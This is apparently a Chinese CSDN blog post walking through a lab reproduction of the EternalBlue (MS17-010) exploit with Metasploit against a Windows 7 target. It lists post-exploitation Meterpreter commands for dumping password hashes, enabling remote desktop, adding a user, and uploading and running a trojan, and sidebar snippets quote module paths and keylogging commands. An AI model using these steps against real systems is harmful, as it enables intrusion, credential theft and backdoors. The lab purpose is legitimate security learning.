有关永恒之蓝的一些操作

最新推荐文章于 2024-04-05 14:30:02 发布
最新推荐文章于 2024-04-05 14:30:02 发布
阅读量734 收藏 4
点赞数 1
文章标签: linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_13579/article/details/128632368
版权

一、实验环境
windows 7机器作为靶机存在永恒之蓝的漏洞
 kali linux机器作为攻击机

打开win7的cmd输入ipconfig,查看一下靶机的IP

打开kali的终端,输入ifconfig,查看攻击机的IP

用攻击机去ping靶机

用靶机去ping攻击机

两者都可以互相ping通才可以 

可能会遇到ping不通的情况:

1.看一下防火墙是否关闭

2.看一下虚拟机的网络连接方式是不是都在NAT模式下

二、实验步骤

首先进入到root下:

 1、在msf中找一下msf的脚本

 2、使用ms17-010的辅助性脚本


3、配置ms17-010的辅助性脚本


4、配置完成后,执行ms17-010的辅助性脚本

5、使用ms17-010攻击性模块

6、查看配置项

7、设置被攻击机器ip

8、运行ms17-010攻击模块

9、成功建立会话后,使用一些功能
(1)shell    #直接给一个shell命令执行终端
    exit   #退出shell命令执行终端
(2)sysinfo  #查看靶机信息
(3)ipconfig  #查看靶机网络配置
    ifconfig   #查看靶机网络配置
(4)hashdump  #下载靶机用户的hash
(5)screenshot  #可以对靶机屏幕截图
(6)ps    #查看靶机正在运行的进程
(7) 在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面
输入shell,进入shell命令行终端
使用dos命令 net user 去创建一个用户
 (8 )使用upload 上传文件
upload /home/kali/桌面/Server.exe C:\\Windows
上传成功后 进入shell页面
cd 切换到上传目录  
输入木马的名字敲击回车

x_13579
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全小白学kali———“永恒之蓝
weixin_58457050的博客
04-30 1453
kali
kali之永恒之蓝使用流程(操作全套步骤)
m0_63028223的博客
04-01 5098
kali之永恒之蓝使用流程
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
关于永恒之蓝的漏洞复现---靶机上创建一个新用户的详细过程
want_to_的博客
05-08 424
关于永恒之蓝的漏洞复现---靶机上创建一个新用户的详细过程
网络渗透系列(三)Kali渗透工具- metasploit利用永恒之蓝漏洞攻击Windows系统全流程(全程干货、火爆连载更新中...)
Midheart1的博客
12-29 817
永恒之蓝漏洞Windows10及之前的系统都存在永恒之蓝漏洞,有很多业界大佬纷纷提出过这个事情,所以永恒之蓝这个经典案例依然值得学习和深入开发。
永恒之蓝检测.zip
10-20
以下是一些关于永恒之蓝网络安全的知识点: 1. **永恒之蓝漏洞**:MS17-010漏洞是由美国国家安全局(NSA)开发的网络武器工具泄露后,被黑客组织利用发起的攻击。它利用SMB服务的漏洞,允许攻击者远程执行代码,...
win2012R2永恒之蓝安全补丁.zip
05-12
《Windows Server 2012 R2与永恒之蓝安全补丁详解》 在网络安全领域,永恒之蓝(EternalBlue)是一个具有里程碑意义的漏洞,它曾被广泛利用于 WannaCry 勒索软件攻击中,对全球范围内的Windows系统造成了严重威胁。...
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝测试.docx
07-23
永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描目标主机的开放端口和服务。命令为:`nmap –Pn –Sv –T4 IP 地址`,其中 `-Pn` ...
网安永恒之蓝检测工具
04-02
永恒之蓝(EternalBlue)是利用微软Windows系统MS17-010安全漏洞的一种攻击工具,由NSA(美国国家安全局)开发,后被黑客组织泄露并广泛用于恶意攻击,例如 WannaCry 勒索病毒就与此漏洞有关。 该工具的"傻瓜式操作...
MSF永恒之蓝使用
Brucye
04-02 858
MSF永恒之蓝MS17-010 1. 扫描漏洞 use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp) set RHOSTS 192.168.167.60(设置被扫描ip) run(开始扫描,查看是否存在漏洞) 检测到可以使用永恒之蓝 2. 漏洞攻击 use exploit/windows/smb/ms17_010_eternalblue(加载攻击模块) set RHOSTS 192.168.167.60(被攻击IP) set LHOST 192.168.
网络安全入门第一课—永恒之蓝(ms17-010)
m0_56088051的博客
07-13 5987
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
kali与永恒之蓝
qq_52820087的博客
10-25 7513
kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱好,本人非网络安全专业。写这个呢是为了记录一下去年我第一次在虚拟机上成功实现了永恒之蓝攻击,同时给一个”小朋友“做参考。目前,永恒之蓝漏洞已经销声匿迹了,所以大可不必担心。 一、永恒之蓝是何方神圣?   永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影
20222959 2022-2023-2《网络攻防实践》第1周作业
qq_44823422的博客
03-06 546
网络攻防实践第一周作业
永恒之蓝的简单介绍以及利用
weixin_52515588的博客
05-02 1190
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 进入管理员模式。 msfdb init 初始化数据库。 启动meta...
Kali 永恒之蓝(最基础的攻击指令),程序员进阶
最新发布
m0_60607397的博客
04-05 315
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
msfconsole中永恒之蓝操作与应用
qq_59020256的博客
03-11 567
help #获取所有可用命令getuid #获取当前权限screenshot #截屏hashdump #获取密码的hashps #获取进程列表sysinfo #获取系统信息route #获取路由表getpid #获取当前攻入的进程pidmigrate #将当前后门注入迁移到其他程序keyscan_start # 开启键盘记录keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe。
永恒之蓝争夺Windows操作系统那个版本
06-08
永恒之蓝是利用Windows操作系统漏洞进行攻击的工具,具体来说是针对SMBv1协议的漏洞。SMBv1协议是一种过时的网络文件共享协议,从Windows Vista开始,Microsoft就已经推出了更新的SMBv2和SMBv3协议,并逐步淘汰了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值